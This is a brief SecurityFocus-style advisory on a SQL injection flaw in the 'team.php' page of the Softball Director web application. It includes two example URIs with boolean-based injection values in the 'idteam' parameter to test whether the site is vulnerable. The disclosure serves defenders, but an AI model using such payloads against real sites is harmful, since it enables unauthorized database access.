Softball Director 'team.php' SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URIs are available:

http://www.example.com/team.php?idteam=1+and+1=1--+ #true

http://www.example.com/team.php?idteam=1+and+1=2--+ #false


 

Privacy Statement
Copyright 2010, SecurityFocus